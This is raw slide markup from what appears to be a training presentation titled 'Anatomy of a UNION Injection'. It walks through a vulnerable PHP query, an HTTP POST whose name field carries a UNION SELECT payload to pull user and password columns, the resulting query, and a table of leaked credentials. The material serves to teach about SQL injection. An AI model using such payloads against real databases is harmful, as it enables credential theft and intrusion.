                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>FROM users</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>UNION</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>SELECT user, pass</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>FROM users</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="3200" dirty="0">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122B58BA-FC9F-44F8-9625-12C1E3B18260}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2667000"/>
              <a:ext cx="2343527"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LEFT QUERY</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF656D0F-0CD9-4E5C-9655-14617D1ACED3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="451879" y="3662303"/>
              <a:ext cx="1330814"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UNION</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="Table 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C2B1A6-5A4A-4953-83ED-5C4789F9CE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3234875771"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3352800" y="4572000"/>
          <a:ext cx="3253610" cy="1598365"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1626805">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1140279928"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1626805">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3612358718"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="527901">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>First Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Last Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2501053273"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="535232">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Jane</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Doe</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3018436078"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="535232">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jane.doe</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>29024d82</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1602689102"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E06A24C-0F4A-49D2-84E7-771780709261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451879" y="5100935"/>
            <a:ext cx="2238113" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RETRIEVES:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBA3D031-A3BE-46E2-8283-FEA7A21A77EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="2582374" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3598DB"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RIGHT QUERY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1395227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294F20-5679-438E-94B7-D21556C04B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6538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5C0A43E-6B2C-4A63-96DC-FACD61A8BC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4504679"/>
            <a:ext cx="9144000" cy="600721"/>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CA170A7-2FF1-49D1-A607-F3786E0C13E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2590800"/>
            <a:ext cx="9144000" cy="186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50DF54-167B-487C-A869-5CFBE02B800A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="653854"/>
            <a:ext cx="9144000" cy="186003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880EA3D0-2D4F-4858-B9D3-DA27C9F46BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="370457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FAD2F2-EB85-4C8A-A9AF-73A29236B9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811749" y="3694418"/>
            <a:ext cx="76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31631F-74FC-4EDC-ADCB-D23701ACC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320674" y="0"/>
            <a:ext cx="5470526" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E04006"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6DF2F51-F6FA-4611-B10D-2ACF3B8316D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="762000"/>
            <a:ext cx="3312125"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1 User Submission</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51B9E08-B81D-4B2D-94CC-2AE7BC354BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2738735"/>
            <a:ext cx="2151551" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2 PHP Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435C1F6C-D4F5-4FAE-A3D7-7D42698BCE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594252" y="1273497"/>
            <a:ext cx="8731878" cy="1200329"/>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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getUserInfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.api.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name=1’+UNION+SELECT+user,pass+FROM+users;--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;email=j@doe.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4EE1BD4-F18F-437B-8B2A-B5AF7BB3598C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="4567535"/>
            <a:ext cx="5791200" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3 After Substitution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle: Rounded Corners 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED68501-EF71-41FB-ACD8-2F3B4108D6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5105400"/>
            <a:ext cx="8534400" cy="129540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$query =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“SELECT first, last FROM users WHERE name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	   UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user,pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> FROM users;-- </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mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This selects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>last </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5EF6E15-877E-49C0-B26F-B190FB70744F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594252" y="3182921"/>
            <a:ext cx="8594019" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// $name contains “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1’ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user,pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
